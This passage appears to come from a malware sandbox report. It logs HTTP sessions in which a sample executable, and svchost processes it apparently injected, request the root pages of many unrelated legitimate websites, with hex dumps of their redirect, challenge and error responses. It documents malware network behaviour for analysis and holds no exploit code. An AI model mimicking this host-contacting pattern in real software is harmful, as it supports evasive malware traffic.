                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC260INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:14 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 07:06:14 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T6BuK23lFbl%2BsxaJqpM4aBnO79rR7z3PgCblbTN%2BW8WMyibKIYlUnJnNX3UlpyoiBez97Xqpf%2BeKtHDTI70Y5aRYVKJhsxSQmgf6G5DRArjYD4iK4zkOTIwM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a81b9ae59b1c-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC261INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC261INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        160192.168.2.664917188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2381OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: sigtoa.com
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2382INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:29 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ml1YeOB8yr1E5i7CqwEW2PLZgRPwKeqiuGTxvoRt8cz0VSWdV%2FQuTPTv4rxbHkauFy7VGlOsFpl40IKuJZUfS9063aPNB%2FhHPRHurY5LOIGgi9PjkPwF8WsMvFf6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a87afd67bb4f-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2383INData Raw: 31 65 62 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78
                                                                                                                                                                                                                                                                        Data Ascii: 1ebc<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robots" content="noindex
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2383INData Raw: 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 20 68 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73
                                                                                                                                                                                                                                                                        Data Ascii: ,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 class="zone-name-title h1"> <img clas
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2385INData Raw: 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 68 76 30 34 79 73 6e 63 68 63 5f 4a 57 45 33 37 41 58 42 75 58 59 62 55 39 41 48 58 77 37 43 71 6c 30 59 34 44 42 55 38 37 70 67 2d 31 36 37 38 34 33 31 33 38 39 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 52 41 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6d 64 22 20 76 61 6c 75 65 3d 22 4b 5a 5a 38 74 74 35 4a 68 4e 34 36 4c 63 42 35 45 38 4b 43 64 4f 44 43 58 4c 33 38 4d 5f 53 73 31 75 64 47 4c 4a 71 35 6a 50 63 2d 31 36 37 38 34 33 31 33 38 39 2d 30 2d 41 53
                                                                                                                                                                                                                                                                        Data Ascii: "/?__cf_chl_f_tk=hv04ysnchc_JWE37AXBuXYbU9AHXw7Cql0Y4DBU87pg-1678431389-0-gaNycGzNCRA" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="md" value="KZZ8tt5JhN46LcB5E8KCdODCXL38M_Ss1udGLJq5jPc-1678431389-0-AS
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2386INData Raw: 5a 76 38 5f 58 4c 6d 42 73 65 35 62 34 72 72 50 54 6d 71 43 66 4d 31 77 64 6c 42 4d 38 4f 4f 63 4d 6a 78 42 4a 55 53 31 37 46 42 76 77 30 41 78 59 2d 59 71 73 62 50 41 41 45 56 32 47 76 4e 49 53 6c 56 43 63 72 42 77 6d 4a 45 58 6d 34 35 53 7a 74 64 64 71 74 2d 70 61 39 71 63 67 59 6d 33 5a 4c 6e 72 4c 63 76 6b 33 36 58 4a 61 35 62 6c 6c 35 6e 6f 79 73 76 6b 61 56 70 59 44 66 65 34 5a 31 47 42 4f 47 59 64 63 39 52 35 6e 57 74 74 67 35 45 62 61 32 52 68 57 78 76 43 4f 62 72 7a 6f 4f 73 77 4f 58 47 43 78 62 5a 53 6c 53 6a 33 37 62 6c 55 54 65 76 38 6f 6e 4a 78 34 6c 55 6d 75 4b 4d 6a 73 79 56 37 37 59 77 48 47 36 61 32 55 43 53 4f 62 6f 67 65 78 6e 53 46 6f 77 7a 36 37 63 79 51 44 59 61 39 43 59 58 7a 2d 30 6b 53 77 74 50 6b 55 58 48 68 33 2d 76 31 62 55 79
                                                                                                                                                                                                                                                                        Data Ascii: Zv8_XLmBse5b4rrPTmqCfM1wdlBM8OOcMjxBJUS17FBvw0AxY-YqsbPAAEV2GvNISlVCcrBwmJEXm45Sztddqt-pa9qcgYm3ZLnrLcvk36XJa5bll5noysvkaVpYDfe4Z1GBOGYdc9R5nWttg5Eba2RhWxvCObrzoOswOXGCxbZSlSj37blUTev8onJx4lUmuKMjsyV77YwHG6a2UCSObogexnSFowz67cyQDYa9CYXz-0kSwtPkUXHh3-v1bUy
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2387INData Raw: 61 79 3a 20 27 37 61 35 39 61 38 37 61 66 64 36 37 62 62 34 66 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 36 62 66 31 36 62 63 62 63 35 63 33 35 31 61 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 68 76 30 34 79 73 6e 63 68 63 5f 4a 57 45 33 37 41 58 42 75 58 59 62 55 39 41 48 58 77 37 43 71 6c 30 59 34 44 42 55 38 37 70 67 2d 31 36 37 38 34 33 31 33 38 39 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 52 41 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 46 50 57 76 3a 20 27 67 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 27 31 30 30 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4d 54 69 6d 65 4d 73 3a 20 27 30 27 2c 0a 20 20 20 20
                                                                                                                                                                                                                                                                        Data Ascii: ay: '7a59a87afd67bb4f', cHash: '6bf16bcbc5c351a', cUPMDTk: "\/?__cf_chl_tk=hv04ysnchc_JWE37AXBuXYbU9AHXw7Cql0Y4DBU87pg-1678431389-0-gaNycGzNCRA", cFPWv: 'g', cTTimeMs: '1000', cMTimeMs: '0',
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2389INData Raw: 7a 54 49 31 33 69 59 73 74 73 58 51 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 4f 75 49 70 70 73 6d 6d 47 48 37 31 68 76 53 57 62 55 34 72 70 67 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 6f 34 34 57 4d 64 5a 72 36 61 5a 51 52 73 51 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 3a 20 27 6a 57 32 78 52 42 73 71 57 31 76 4c 74 75 42 6f 6f 58 39 61 4b 6d 45 44 32 63 5a 68 41 4c 37 73 6b
                                                                                                                                                                                                                                                                        Data Ascii: zTI13iYstsXQ==', i2: 'OuIppsmmGH71hvSWbU4rpg==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3o44WMdZr6aZQRsQ=', hh: 'jW2xRBsqW1vLtuBooX9aKmED2cZhAL7sk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2390INData Raw: 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 0a 20 20 20 20 7d 28 29 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69 6e 66
                                                                                                                                                                                                                                                                        Data Ascii: UHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendChild(cpo); }());</script> <div class="footer" role="contentinf
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2391INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        161192.168.2.665014185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2399OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2400INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:30 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2400INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        162192.168.2.66457449.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2400OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        163192.168.2.665071172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2401OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: orlyhotel.com
                                                                                                                                                                                                                                                                        Cookie: django_language=en
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2487INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:30 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 06:46:34 GMT
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:46:34 GMT
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0fx9gXptUm3rtKlEA43WK%2F%2B8Du87HomDAnxE%2BPY8Q8TLxHCxW3F2bfCyt8tyLMoQk1IvXq39WpQBBRszsKlTPy76J8LAc62wIcftpxsUKAYSiyziFPW9igq4c578Ezj4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a87c09ca915c-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2488INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2488INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        164192.168.2.665131138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2401OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2402INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:30 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2402INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        165192.168.2.6651565.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2401OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2402INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:30 GMT
                                                                                                                                                                                                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Length: 51841
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2435INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
